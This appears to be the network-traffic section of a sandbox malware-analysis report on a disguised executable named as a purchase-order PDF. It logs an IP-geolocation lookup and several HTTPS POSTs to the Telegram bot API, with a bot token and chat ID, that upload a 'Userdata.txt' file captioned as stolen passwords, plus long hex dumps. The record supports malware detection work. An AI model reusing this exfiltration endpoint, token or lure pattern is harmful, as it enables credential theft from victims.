                                                                                                                                  Data Ascii: ]:)H=H]q/,z" ~`SzmEiOy:aV?RuC|)"8eLF"(Lj5o=D;gg|8cIC]ll\\C6Nvr:7:J'r&~;T+~>3'Ga$H&=(/LfSXm*?z&A>o$}e+:A%D~m|[A&
                                                                                                                                  2024-12-19 14:29:28 UTC1323INData Raw: 84 b8 19 1e ef 8c 8c e1 38 32 cb 9f 50 72 72 2d b5 d2 12 23 8a 13 1c 26 80 a3 34 39 31 d8 02 ad 94 f6 5f 88 dd cb a1 70 10 7e 2e c9 34 4d 2b 83 3c a2 05 c6 4d d1 9a ca 27 85 32 0a b2 d2 29 1a da b2 07 27 8d ee 5b c6 e3 ea 88 89 7e 75 e8 0b 1b 8a 78 f6 7b c9 b8 d9 8a 28 c3 69 cb c2 8b 9f e5 3e f4 eb ae 28 c0 f8 d1 ba 23 3b 31 f4 b2 01 e9 fb 7e 70 84 8d c2 1c 1d 9c 1a 98 bd a0 19 78 35 33 47 10 77 60 0c e5 12 b6 f8 8c 80 57 59 29 e3 b0 81 14 4d 75 91 dd fd 88 c3 19 2d e1 68 13 46 0c 34 a8 ed bc 86 e7 96 de b8 39 60 ac b0 69 df 0c 53 dc 7f b3 65 41 49 28 c4 4b 95 71 77 00 5d e1 42 e5 ed b8 a4 f9 fd 42 12 0c 1a 41 e3 38 dc 62 04 03 75 cd 55 34 18 33 df 2b 80 dc d7 62 96 b4 c8 be 76 b3 43 10 44 8e b9 2f 20 f8 bd ed 12 18 19 4b 12 db 61 55 5f 41 0b 5b a1 3c a6
                                                                                                                                  Data Ascii: 82Prr-#&491_p~.4M+<M'2)'[~ux{(i>(#;1~px53Gw`WY)Mu-hF49`iSeAI(Kqw]BBA8buU43+bvCD/ KaU_A[<
                                                                                                                                  2024-12-19 14:29:28 UTC1390INData Raw: b8 d7 02 1a 98 f3 c0 f3 37 c8 3a 95 02 19 32 1d e2 61 e1 27 81 0b df 9b 70 ee 3e 97 ce 88 51 23 5a e9 bd 79 5a 5d a8 36 69 d5 4c 4a 90 a9 19 bb 04 62 f6 4a 30 73 ad f4 13 be c6 cc ee 3f 2d a8 3b 08 54 8a 4c 46 df 5b fe 2b a7 23 e5 05 e5 93 ba 49 31 a0 5d fc a5 25 a2 b2 a9 93 e6 a1 0d ad e1 2f 1a 11 4f 01 58 66 d8 4f 94 c4 8f b4 dc 22 82 f2 dd 99 e0 1b 26 c9 90 c8 aa a2 79 60 51 b4 84 03 ab c5 1c d5 f2 17 4c 9c c2 2b 66 6d 59 f8 1b 51 68 31 9f 97 bd 9c f7 11 1d c0 90 7b bb 19 1d 14 57 ca a6 39 ca 81 3e 67 bf 4b 75 1a b9 04 74 de 6d 2d dd 0a 12 fc 0f 61 aa c2 b5 f3 46 fe 9f d0 88 7b 65 6e 4e 75 23 26 02 b5 65 9e 6d b2 78 6d 87 af 6f c9 42 9a 35 7b 5d 89 4e ce d6 09 fc 6e 02 30 86 79 7f 90 10 d3 c1 e7 8f b4 50 08 8a 8b de 48 69 82 00 40 29 90 96 8e bb 12 f1
                                                                                                                                  Data Ascii: 7:2a'p>Q#ZyZ]6iLJbJ0s?-;TLF[+#I1]%/OXfO"&y`QL+fmYQh1{W9>gKutm-aF{enNu#&emxmoB5{]Nn0yPHi@)
                                                                                                                                  2024-12-19 14:29:29 UTC1390INData Raw: 56 24 cc 83 10 08 e8 f6 58 0e 5e 64 a2 14 af 54 2f 49 dc 6a 25 36 6e e1 01 c2 40 16 16 5e c5 3c 63 71 23 7d 57 d8 a3 88 1c 57 6f 21 01 5d cb 91 93 65 2d 14 bf 86 bf 2b 2c 79 25 dd a4 2e 2a f5 43 d4 03 16 ca 78 53 1b 70 d6 2b 6f 95 02 4e 84 69 a7 2b 58 6a 03 45 76 8c 80 34 00 a6 b2 cb 53 8f 99 1d 48 0e d9 5d 0b da d1 3a 44 0b c1 a8 d1 98 d4 60 dd 09 55 27 e6 c0 00 43 7d a4 bb 1f cc 54 6f c3 06 44 2a 67 76 11 e8 29 7a c1 f0 d2 9d a5 1d c3 5d 43 0e d9 45 90 a6 10 97 b6 4f 4c f6 c3 58 f0 04 23 95 76 63 80 dd dc ad 00 8b df e3 9f 6f 2b a5 b6 1d f2 3f b1 6f e1 45 a5 83 4b 1c 34 9f 05 f1 ef 3a 12 28 f3 03 22 9c 32 cd 52 d6 29 93 1e 39 ff e8 5a dd aa 27 fe ae 1b f9 9d 3d ee 84 d5 75 4c d6 1a 34 06 45 ef 3b 73 5d dd 54 e4 02 77 aa 96 88 6d 0e c1 5c 43 3e ea be 1d
                                                                                                                                  Data Ascii: V$X^dT/Ij%6n@^<cq#}WWo!]e-+,y%.*CxSp+oNi+XjEv4SH]:D`U'C}ToD*gv)z]CEOLX#vco+?oEK4:("2R)9Z'=uL4E;s]Twm\C>
                                                                                                                                  2024-12-19 14:29:29 UTC1390INData Raw: a8 18 c8 a0 aa 4f b8 db a5 d0 96 81 fb 08 60 46 7b cf 3e 33 b3 b1 cf 66 e0 26 0f d1 8f 49 81 0f 62 4f 32 7d e6 48 75 89 7b 7a d3 46 53 73 e6 23 15 ff 01 9b bf 79 db 88 0b 19 61 ce 92 e8 9f da 9b cf 0e c0 5d 80 36 68 6f c0 e1 b9 75 bc 14 b8 85 d2 52 ed 64 9a 7a 9e f6 1a d6 eb 4f e8 ab 7c 49 85 0c 48 d8 28 2b b1 76 56 c0 fc 7d 43 42 8f 7e 35 63 d8 e1 3b 80 5d 12 68 4f 43 27 aa 07 97 29 f1 c4 99 21 3f f8 54 62 79 bd 92 b0 75 6a 55 cc d4 c4 af 39 59 ff 35 0e b1 a8 2e 1d 1c 5e 30 ed 4e 52 77 96 25 a8 5b a5 1c d4 8d 20 43 da a2 82 c0 47 e9 7b 4b b0 16 31 d8 8c 8e 1b 7b 05 aa 2a 99 00 45 37 e8 99 d6 48 c7 49 c0 4b 2d ec 35 38 8f 72 59 04 6d 8d 60 9e 64 3f fa 72 b9 ea 7c bd 26 54 0e 33 85 1c cf 91 af 85 86 98 04 dd f9 98 46 c4 0f cf d6 eb 62 8a eb f1 d7 84 1f 5c
                                                                                                                                  Data Ascii: O`F{>3f&IbO2}Hu{zFSs#ya]6houRdzO|IH(+vV}CB~5c;]hOC')!?TbyujU9Y5.^0NRw%[ CG{K1{*E7HIK-58rYm`d?r|&T3Fb\
                                                                                                                                  2024-12-19 14:29:29 UTC1390INData Raw: 19 c4 f7 cc 51 83 4d 49 b0 70 50 b6 eb 9f e8 9b ee 48 87 b7 40 cc 2e 43 b7 58 0c 62 54 35 83 12 8c 62 27 c1 6e 74 8d aa 58 8c 66 05 c7 92 1d f8 d3 ae 28 f6 52 cd 5a dc de 4c 1e 2b 2e 8b 49 f3 a8 50 c8 b4 bf de 6c 55 03 fb 6b e0 17 5f 12 b5 2b e7 11 4a ce d8 9f 70 f6 35 91 c4 3d a0 f3 d8 43 93 a4 e8 47 ca 5a 36 16 43 ce bb b2 a5 f8 74 74 5d 52 a2 3f 9b 3c ba ae d7 86 16 09 89 4e 4e 7f 8e 3a 2e 47 25 30 dc 23 e0 6e d1 a2 03 1a e0 5c 07 88 e6 ad 39 60 ce 8a eb 0c a1 ed ab f1 94 65 8a c5 c1 3f 73 e0 4f a8 f0 41 0b ce 0e 8e ad 11 0a 6a c6 9f ea 2d 11 36 89 78 d2 0f 67 bf c3 13 49 c3 11 67 66 91 aa 18 ae 4a 93 04 be 95 de 8d 88 f6 e1 a1 5a bf f0 47 be 71 5c 2c f5 a2 bc 7e fb 22 04 9e e2 f0 ea 6d 00 cf 94 01 a6 de b2 01 1e 88 ee 4a d1 a1 0a 8d 13 0e 63 c0 ae 1b
                                                                                                                                  Data Ascii: QMIpPH@.CXbT5b'ntXf(RZL+.IPlUk_+Jp5=CGZ6Ctt]R?<NN:.G%0#n\9`e?sOAj-6xgIgfJZGq\,~"mJc
                                                                                                                                  2024-12-19 14:29:29 UTC1390INData Raw: 0f ad e8 ab a7 d1 30 38 fc 9e 20 5d ed 91 ff 34 54 24 9e 29 d2 eb 8c 76 e8 c3 4d 4d 60 47 97 7c 10 90 91 1d 33 05 a7 f1 fd 75 2a 9e 8f cf 97 f1 be f7 d9 31 e0 b2 c0 55 2a c9 8a 21 cd 0c 8c 81 4b 84 65 88 3b e0 7b 92 c8 4d d1 e9 e4 3d b3 4b 4a fa 5b a9 6e d2 a8 a5 43 83 ca d7 e6 86 28 f1 08 29 75 7c 78 d4 f7 aa 15 b8 1f 21 c0 0b 73 43 f6 c0 e4 91 9f c0 e2 2e 7c 24 45 c1 44 f8 24 f8 31 dc 8a 73 3e f9 88 bc be 52 0b ab 4b 98 68 45 cc 6d 69 7a df ff 63 a0 96 64 23 3b 12 54 63 b5 65 df 18 14 ba c8 61 cb 28 20 1b 1a 38 68 a6 59 4c 2f f6 db 32 b2 27 55 22 d7 3c fc 5c 3b c3 fa c8 bb 19 36 ce 83 9d 96 71 3b a1 91 8d 29 de 4e 01 52 7f d5 ed 9b ef 8d b0 cd 05 ab ac dd 99 e8 9b 34 c9 ea 5b aa ad 68 67 46 62 8c 34 b0 c2 47 d0 cc f7 9e 63 3d 3a 66 c0 90 dd 33 68 63 2b
                                                                                                                                  Data Ascii: 08 ]4T$)vMM`G|3u*1U*!Ke;{M=KJ[nC()u|x!sC.|$ED$1s>RKhEmizcd#;Tcea( 8hYL/2'U"<\;6q;)NR4[hgFb4Gc=:f3hc+
                                                                                                                                  2024-12-19 14:29:29 UTC1390INData Raw: 51 ab df 1c 98 4c f8 5d 67 dd ee 0a 88 06 d5 00 78 c5 95 2f 15 63 2a f4 0b cb 57 bc 0f 8d 6b c1 55 49 6c 64 c0 5b c6 3f 9e 70 d1 31 2a 7e 7f 44 24 66 21 ba b6 81 95 45 8e 6f 79 b1 62 bf e9 4c 4f 3a 27 91 90 7b c1 33 10 aa 70 e1 56 9a 7a 58 27 ea c4 e9 ad b5 87 67 ff 45 0a d7 ba 0f 71 e3 be db bb 48 b3 64 4c c8 25 b2 59 41 f8 cc 88 17 1c f4 c8 8f ec a0 9b 4c 18 be 87 a5 7f fa 48 2b 45 8a f2 0f c8 7b 4b 07 50 de ec 11 21 13 3c 3b b7 48 88 1c 5d 78 e4 6e b2 cb c6 98 76 3d 6f b0 f4 eb 21 2c 09 0d d7 a4 2e 21 fd 62 c1 12 73 b8 88 53 28 7a c5 28 7e 98 71 97 5c 69 ad 96 39 4a 31 56 11 7e d9 e2 8d f5 b8 cb 54 b4 75 0b 5b 11 a0 b8 37 9c a0 29 52 1c a0 6e c5 8e c3 7f ba 89 0f 3b ec 96 7e 85 6b 35 9d e9 c4 3b bc 3d 07 51 2a ac 72 04 e7 2b 64 d5 e1 c5 8e bd 15 f9 5f
                                                                                                                                  Data Ascii: QL]gx/c*WkUIld[?p1*~D$f!EoybLO:'{3pVzX'gEqHdL%YALH+E{KP!<;H]xnv=o!,.!bsS(z(~q\i9J1V~Tu[7)Rn;~k5;=Q*r+d_
                                                                                                                                  2024-12-19 14:29:29 UTC1390INData Raw: dd 22 ac f9 87 19 da be 16 ba 5e 4a 02 0c 4e 8e b9 2f 0a f8 ae f6 22 12 4e 60 13 db 0b 71 5f 41 0a 5b a3 42 df 73 0e 8d dd 35 76 63 a1 25 e3 91 37 fb 5e e8 20 c9 89 d9 54 b5 92 98 54 5d ec 7a 43 9a db fe 8b 40 21 8d e7 ef 2d 21 6c 3c 66 d2 b2 8c a9 e8 30 fa 8d a5 fd 61 53 ae 1b b6 d5 0f 83 58 1a 41 f8 ed 13 b4 ee d7 d1 af 34 ca a0 7a 77 bb cd a0 dd 85 96 fc 22 60 4e 71 f8 4a 5b bd b0 bf 09 04 26 0f c6 82 43 e2 c0 0b 31 5e 55 d8 27 a0 83 70 6a 4d 1b 5b 62 e0 5d 8e cb f9 eb d0 a6 cd 76 0c 07 6d cc 92 d1 09 f6 92 dd 0e cc 4c b0 c7 2b 69 e8 e2 ca 97 ad 7b cc 9a a1 a1 82 61 91 7d bc 24 8e d6 e1 61 00 a2 6d 4a 82 f4 58 cd 4d c6 bb 60 a2 d2 e7 5d 11 58 ab 07 63 c9 d8 eb 19 ab 58 7d 3d 5c 4a 3c b2 7a 22 bc f1 c5 8c 38 2b f2 3b 9f 52 9d 98 8b d4 7b 5e d5 d0 c4 a4
                                                                                                                                  Data Ascii: "^JN/"N`q_A[Bs5vc%7^ TT]zC@!-!l<f0aSXA4zw"`NqJ[&C1^U'pjM[b]vmL+i{a}$amJXM`]XcX}=\J<z"8+;R{^


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  2192.168.2.549738104.21.67.1524434796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-19 14:29:33 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-19 14:29:33 UTC872INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 19 Dec 2024 14:29:33 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 362
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 607342
                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i2jkBvEqZYbGVw7S%2FvSwHdF0R4143LLNjQRImZrgJzWY8xl73s4C6BtWAfaxohQ1S9vAloQxhrJPTBwdC81jef2qri6b71sigZeq1Lm0xKSZtEGPxDxTqWinkzA5HXvI3wTFjTEd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f4815e64a90f793-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1516&min_rtt=1511&rtt_var=577&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1880231&cwnd=140&unsent_bytes=0&cid=52bfa74b386b25f3&ts=456&x=0"
                                                                                                                                  2024-12-19 14:29:33 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  3192.168.2.549756149.154.167.2204434796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-19 14:29:41 UTC296OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd200fa9571766
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-19 14:29:41 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 30 30 66 61 39 35 37 31 37 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd200fa9571766Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-19 14:29:42 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Thu, 19 Dec 2024 14:29:41 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 544
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-19 14:29:42 UTC544INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 33 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 35 38 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":19637,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618581,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  4192.168.2.549766149.154.167.2204434796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-19 14:29:45 UTC296OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd203f031927ac
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-19 14:29:45 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 30 33 66 30 33 31 39 32 37 61 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd203f031927acContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-19 14:29:45 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Thu, 19 Dec 2024 14:29:45 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 543
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-19 14:29:45 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 35 38 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":19643,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618585,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  5192.168.2.549776149.154.167.2204434796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-19 14:29:48 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd206889082f42
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  2024-12-19 14:29:48 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 30 36 38 38 39 30 38 32 66 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd206889082f42Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-19 14:29:49 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Thu, 19 Dec 2024 14:29:49 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 543
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-19 14:29:49 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 35 38 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":19647,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618589,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  6192.168.2.549785149.154.167.2204434796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-19 14:29:52 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd209070a17673
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
